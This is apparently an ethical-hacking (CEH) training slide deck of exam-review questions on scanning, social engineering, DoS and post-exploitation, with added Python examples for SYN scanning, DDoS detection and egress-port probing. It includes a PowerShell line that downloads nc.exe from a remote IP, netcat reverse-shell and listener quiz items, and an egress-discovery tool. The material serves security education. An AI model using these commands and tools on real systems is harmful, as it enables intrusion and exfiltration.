CEH Day 1
Omar Santos
@santosomar
DAY 1
Social Engineering
Denial-of-Service
Cryptography
IoT Hacking
Cloud Computing
Resources:
CEH Review: https://cehreview.com
The Art of Hacking: https://theartofhacking.org
GitHub: https://h4cker.org/github
https://learning.oreilly.com/certifications/9780136758433/
DISCLAIMER | WARNING
The information provided in this training is for educational purposes only. Neither the author, O’Reilly,
nor any other entity is responsible for any misuse of this information.
Some of the tools and techniques that you will learn in this training class may be illegal to use
depending on where you reside. Please check your local laws.
Please practice and use all the tools that are shown in this training in a lab that is not connected
to the Internet or any other network.
What this class is and is not…
POLL QUESTION
How long have you been performing security penetration testing (ethical hacking)?
• Just started
• Less than a year
• 1-2 years
• 3 years or more
• I have never done pen testing. I am just curious about this training.
https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
EC-Council CEH Exam Collateral
• Exam Brochure:
https://www.eccouncil.org/wp-content/uploads/2016/07/CEHv10-Brochure.pdf
• Blueprint: https://cert.eccouncil.org/certified-ethical-hacker.html
• FAQ: https://cert.eccouncil.org/faq.html
CEH (ANSI) vs CEH Practical
Before we get started with Ethical Hacking…
A few concepts that you must be familiar with (in the form
of review questions)…
What is the CIA Triad?
Confidentiality, Integrity, Availability
Which of the following ensures that data is received without
modification?
a) Integrity
b) Availability
c) Authentication
d) Authorization
e) Confidentiality
Which of the following attacks leverages built-in code and
scripts within off-the-shelf applications?
a) Privilege escalation
b) Heap attacks
c) Shrink-wrap
d) Cross-site scripting
Which of the following describes an attacker that is
motivated by political beliefs?
a) Script kiddie
b) Hacktivist
c) Gray hat hacker
d) Black hat hacker
Which of the following best describes when the tester does not
have any prior knowledge of the systems being tested?
Pre-engagement → Footprinting → Scanning → Enumeration → Vulnerability Analysis → Report → End
Attack types:
https://cehreview.com/go/attack_types
https://cehreview.com/go/attack_types2
• Maltego
• Recon-ng
• SpiderFoot
• theHarvester
• Discover
• OWASP Amass
Additional References for Passive Recon
Examples:
Scanners: Nmap, Nessus, Qualys, Nexpose, Retina
https://github.com/The-Art-of-Hacking/art-of-hacking/blob/master/cheat_sheets/PowerShellCheatSheet_v41.pdf
SNMP
b) SNMPv3 uses two authenticating credentials: the first is a public key to view the configuration or to obtain the
health status of the device, and the second is a private key to configure the managed device. SNMPv2c uses three
credentials, including a certificate.
c) SNMPv2c uses certificates for authentication or a pre-shared key. SNMPv3 authenticates SNMP users using usernames
and passwords.
d) SNMPv2c uses two authenticating credentials: the first is a public community string to view the configuration or to
obtain the health status of the device, and the second is a private community string to configure the managed device.
SNMPv3 authenticates SNMP users using usernames and passwords and can protect confidentiality. SNMPv2c does not
provide any confidentiality protection.
Nmap SNMP Scripts
root@kali:/usr/share/nmap/scripts# ls -1 snmp*
snmp-brute.nse
snmp-hh3c-logins.nse
snmp-info.nse
snmp-interfaces.nse
snmp-ios-config.nse
snmp-netstat.nse
snmp-processes.nse
snmp-sysdescr.nse
snmp-win32-services.nse
snmp-win32-shares.nse
snmp-win32-software.nse
snmp-win32-users.nse
root@kali:/usr/share/nmap/scripts#
Other Enumeration You Should Become Familiar With…
• LDAP Enumeration
• NTP Enumeration
• NETBIOS/SMB Enumeration
enum4linux
• IP Scanner (http://10base-t.com)
• Fing
Additional Mobile Scanning Tools
• Hackode
• zANTI
• cSploit
• FaceNiff
• PortDroid
• Pamn IP Scanner
Additional References for Active Recon
• Cheat sheets:
https://cehreview.com/go/cheat
What does the following command do?
# hping3 -S theartofhacking.org -p 80
What does the following command do?
# nmap -F portal.h4cker.org
Which of the following is not an open source scanner?
(Select all that apply)
a) Retina
b) Nmap
c) Qualys
d) Nexpose
Which of the following tools is primarily used to enumerate
domain information?
a) DNSRecon
b) Nmap
c) Metasploit
d) Nikto
When running an Nmap SYN scan, what will the Nmap result be if
ports on the target device do not respond?
a) Open
b) Closed
c) Filtered
d) Listening
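The two command questions above (hping3 -S sends one TCP SYN per second to port 80 and reports the flags of whatever comes back; nmap -F scans the 100 most common ports instead of the default 1000) and the SYN-scan question both come down to the same decision: what a SYN probe's answer means. The following added example (not from the slides) implements that decision and builds a byte-exact TCP SYN segment with a correct pseudo-header checksum. The addresses, ports and the table of constructed replies are made up; actually sending the segment needs a raw socket and root, so that step is left out.

```python
"""Added example (not from the slides): SYN-scan port-state logic and a
TCP SYN segment builder.  IPs, ports and SAMPLE_REPLIES are constructed."""
import socket
import struct
from typing import Dict, Optional

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10


def classify_syn_response(tcp_flags: Optional[int], icmp_unreachable: bool = False) -> str:
    """Nmap's SYN-scan states: SYN/ACK -> open, RST -> closed, ICMP unreachable
    or silence after retransmissions -> filtered.  The scanner answers a
    SYN/ACK with its own RST, so the handshake never completes ("half-open")."""
    if icmp_unreachable or tcp_flags is None:
        return "filtered"
    if tcp_flags & SYN and tcp_flags & ACK:
        return "open"
    if tcp_flags & RST:
        return "closed"
    return "filtered"      # anything else is not an answer to our SYN


def scan_results(replies: Dict[int, Optional[int]]) -> Dict[int, str]:
    """replies maps probed port -> flags byte of the reply (None = no reply)."""
    return {port: classify_syn_response(flags) for port, flags in sorted(replies.items())}


def _checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, socket.IPPROTO_TCP, tcp_len))


def build_syn_segment(src_ip: str, dst_ip: str, src_port: int, dst_port: int, seq: int = 0) -> bytes:
    """20-byte TCP header with only SYN set; the checksum covers the IPv4 pseudo-header."""
    header = struct.pack("!HHIIBBHHH", src_port, dst_port, seq, 0,
                         5 << 4,       # data offset: 5 words, no options
                         SYN, 65535,   # flags, window
                         0, 0)         # checksum placeholder, urgent pointer
    csum = _checksum(_pseudo_header(src_ip, dst_ip, len(header)) + header)
    return header[:16] + struct.pack("!H", csum) + header[18:]


def verify_checksum(src_ip: str, dst_ip: str, segment: bytes) -> bool:
    """A correct segment sums to zero when the checksum field is included."""
    return _checksum(_pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def flags_of(segment: bytes) -> int:
    return segment[13]


# Constructed reply table standing in for captured answers to four SYN probes.
SAMPLE_REPLIES = {22: RST | ACK, 80: SYN | ACK, 443: None, 8080: SYN | ACK}

if __name__ == "__main__":
    for port, state in scan_results(SAMPLE_REPLIES).items():
        print(f"{port}/tcp {state}")
    seg = build_syn_segment("192.0.2.10", "192.0.2.20", 40000, 80)
    print(seg.hex(), verify_checksum("192.0.2.10", "192.0.2.20", seg))
```

Note that "filtered" is the answer for silence: Nmap retransmits the probe before giving up, so a single dropped packet does not produce a false verdict, but a firewall that silently drops traffic looks identical to a host that is not there.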
Which of the following Nmap options would you use to
perform a TCP connect scan?
a) -sF
b) -sU
c) -sT
d) -sS
Which method of information gathering uses publicly
available information sources to collect and analyze
information about a target?
b) Vulnerability Scanning
c) Port Scanning
d) Packet Crafting
Which type of vulnerability scan would require the scanner
to log in to the target system and run privileged commands
to gather results?
a) Discovery scan
b) Unauthenticated scan
c) Authenticated scan
d) Web scan
Vulnerability Analysis and System Hacking
Things that you should know…
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Whiteboard
Explanation
Things that you should know…
first.org/cvss
Product vs. Services Based Vulnerability Assessment
Products VS Services
OpenVAS
http://www.openvas.org/
Remember the EC Council’s Definition of System Hacking
¯\_(ツ)_/¯
a) 41
b) 8080
c) 445
d) 25
What is a Tree Based Assessment Approach?
a) The pen tester uses different strategies for each system and component (i.e.,
different scanners, tools)
b) The pen tester uses the same strategies for each system
a) Malvertising
b) Pharming
c) Active Ad Exploitation
d) Whaling
Which of the following is true about Spear Phishing?
b) Spear phishing attacks are phishing attempts that are constructed in a very specific way
and directly targeted at specific individuals or companies.
c) Spear phishing, Whaling, and Phishing are the same type of attack.
a) Whaling is similar to phishing and spear phishing; however, the attack is targeted
at high-profile business executives and key individuals within a corporation.
b) Whaling is similar to phishing and spear phishing; however, the attack is targeted
at critical systems and cloud services.
b) The victim pays close attention to your gestures, but you should not pay
attention to their posture or body language.
c) If you are conducting an interrogation, you should pay attention to the
victim’s posture, body language, skin color, and eye movement.
d) It is illegal to pay attention to the victim’s posture, body language, color of the
skin, and eye movement during an interrogation.
So what is social engineering?
• Social engineering attacks target the weakest link: the human user.
• If the attacker can get a user to reveal information, causing harm is much easier
than with any other method of reconnaissance.
• This can be done through email or through misdirection to web pages, which results in
the user clicking something that gives the attacker information. Social engineering
can also be done in person, by an insider or an outside entity, or over the phone.
Denial-of-Service
Denial-of-service (DoS) and distributed DoS (DDoS)
• DDoS attacks can generally be divided into the following three categories:
• Direct DDoS attacks
• Reflected DDoS attacks
• Amplification DDoS attacks
Direct DDoS attacks
Botnets
Reflected DDoS attacks
Amplification Attacks
• An amplification attack is a form of reflected attack in which the response traffic (sent by
the unwitting participant) is made up of packets that are much larger than those that were
initially sent by the attacker (spoofing the victim).
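From the victim's side, a reflected or amplification attack looks like unsolicited replies arriving from many legitimate servers at once. The following added example (not from the slides) shows the detection logic for that pattern over flow records: it groups inbound UDP flows by victim and source service port, and raises an alert when many distinct reflectors send large packets to one host. The flow records, addresses, thresholds and the list of abused services are constructed for the example.

```python
"""Added example (not from the slides): reflection/amplification detection
over constructed flow records.  Addresses and thresholds are made up."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# UDP services commonly abused as reflectors: a small request yields a big reply.
AMPLIFIER_PORTS = {19: "chargen", 53: "DNS", 123: "NTP", 161: "SNMP",
                   389: "CLDAP", 1900: "SSDP", 11211: "memcached"}


@dataclass(frozen=True)
class Flow:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    packets: int
    bytes: int


def amplification_factor(request_bytes: int, response_bytes: int) -> float:
    """Bandwidth amplification factor: reply size over the spoofed request size."""
    return response_bytes / request_bytes


def detect_reflection(flows: List[Flow], min_reflectors: int = 3,
                      min_avg_bytes: float = 400.0) -> List[Dict]:
    """Alert per (victim, service) when many reflectors send large packets.
    The victim never sent the requests, so only the reply direction is visible."""
    groups = defaultdict(lambda: {"srcs": set(), "bytes": 0, "packets": 0})
    for f in flows:
        if f.proto != "UDP" or f.src_port not in AMPLIFIER_PORTS:
            continue
        g = groups[(f.dst_ip, f.src_port)]
        g["srcs"].add(f.src_ip)
        g["bytes"] += f.bytes
        g["packets"] += f.packets
    alerts = []
    for (victim, port), g in groups.items():
        avg = g["bytes"] / g["packets"]
        if len(g["srcs"]) >= min_reflectors and avg >= min_avg_bytes:
            alerts.append({"victim": victim, "service": AMPLIFIER_PORTS[port],
                           "reflectors": len(g["srcs"]),
                           "avg_bytes_per_packet": round(avg, 1),
                           "total_mb": round(g["bytes"] / 1e6, 1)})
    return sorted(alerts, key=lambda a: (-a["reflectors"], a["victim"]))


# Constructed records: one ordinary DNS answer to a workstation, and five NTP
# servers all sending large replies to a host that never queried them.
SAMPLE_FLOWS = [
    Flow("198.51.100.1", 53, "192.0.2.50", 51234, "UDP", 1, 120),
] + [
    Flow(f"203.0.113.{n}", 123, "192.0.2.7", 80, "UDP", 2000, 2000 * 468)
    for n in range(11, 16)
]

if __name__ == "__main__":
    for alert in detect_reflection(SAMPLE_FLOWS):
        print(alert)
```

The single DNS reply never trips the detector because one reflector sending one normal-sized packet is just DNS; the signal is the combination of reflector count and packet size, and tuning those two thresholds per service is what separates the alert from noise on a busy resolver.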
Session Hijacking, Evading IDS, IPS, Firewalls, and Honeypots (and more; I want you to
learn beyond CEH)…
• Evasion Techniques: Encryption & Obfuscation
• Demo: Using the EternalBlue Exploit
• Pivoting: Whiteboard Explanation
• Exfil: egressbuster & just a simple letmeout script…
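The idea behind egressbuster and a "letmeout" script is simple: from the compromised host, try to connect outbound on many ports to a box you control and record which ones the firewall lets through. The block below is an added example (not the egressbuster code or anything from the slides) with both sides, the client probe and the catcher it connects to, so it can be exercised on loopback; the port list and the loopback addresses are assumptions.

```python
"""Added example (not from the slides): egress port discovery with a client
probe and the catcher it talks to.  Port list and addresses are assumed."""
import socket
import socketserver
import threading
from concurrent.futures import ThreadPoolExecutor
from typing import Iterable, List, Tuple

# Ports that commonly survive outbound filtering; try these first.
COMMON_EGRESS_PORTS = [21, 22, 25, 53, 80, 443, 465, 587, 993, 3389, 8080, 8443]


def port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Full TCP connect: success means the path out on that port exists."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:           # refused, timed out, unreachable: all mean "no egress"
        return False


def find_egress_ports(host: str, ports: Iterable[int] = COMMON_EGRESS_PORTS,
                      timeout: float = 1.0, workers: int = 16) -> List[int]:
    """Probe the ports in parallel and return the ones that connected."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        verdicts = list(pool.map(lambda p: port_open(host, p, timeout), ports))
    return [p for p, ok in zip(ports, verdicts) if ok]


class _Catcher(socketserver.BaseRequestHandler):
    """Server side: answer every connection so the client knows it got out."""
    def handle(self) -> None:
        self.request.sendall(b"egress ok\n")


def start_catcher(host: str = "127.0.0.1", port: int = 0) -> Tuple[socketserver.TCPServer, int]:
    """Listen on one port (0 lets the OS pick); egressbuster does this for a whole range."""
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    server = socketserver.ThreadingTCPServer((host, port), _Catcher)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def pick_closed_port(host: str = "127.0.0.1") -> int:
    """Grab a free port and release it, giving a port nobody listens on (demo only)."""
    with socket.socket() as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    server, listening = start_catcher()
    print("egress found on:", find_egress_ports("127.0.0.1", [listening, pick_closed_port()]))
    server.shutdown()
    server.server_close()
```

In a real engagement the catcher runs on an Internet host listening on every port in the range, and the probe is what you would run from the foothold; a connect timeout rather than a refusal tells you a filter is dropping the traffic instead of the remote port being closed.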
Which of the following are post exploitation activities to
maintain persistence in a compromised system?
a) The netcat utility is used to create a bind shell on the victim system and to execute
the bash shell.
b) The netcat utility is used to create a reverse shell on the victim system and to
execute the bash shell.
c) The netcat utility is used to create a reverse shell on the victim system and to
exclude the bash shell from being executed.
d) The netcat utility is used to create a reverse shell on the attacking system and to
exclude the bash shell from being executed.
Which of the following commands creates a listener on a
system on port 8899?
a) nc -nv 8899
b) nl -cp 8899
d) nc -lvp 8899
Which of the following is NOT a legitimate Windows tool that
can be used for post-exploitation tasks?
a) PowerShell
b) PowerSploit
c) PSExec
d) WMI
(New-Object System.Net.WebClient).DownloadFile("http://192.168.78.147/nc.exe","nc.exe")
a) SET
b) Mimikatz
c) PowerSploit
d) Empire
What are false positives, false negatives, true positives,
true negatives?
File-less Malware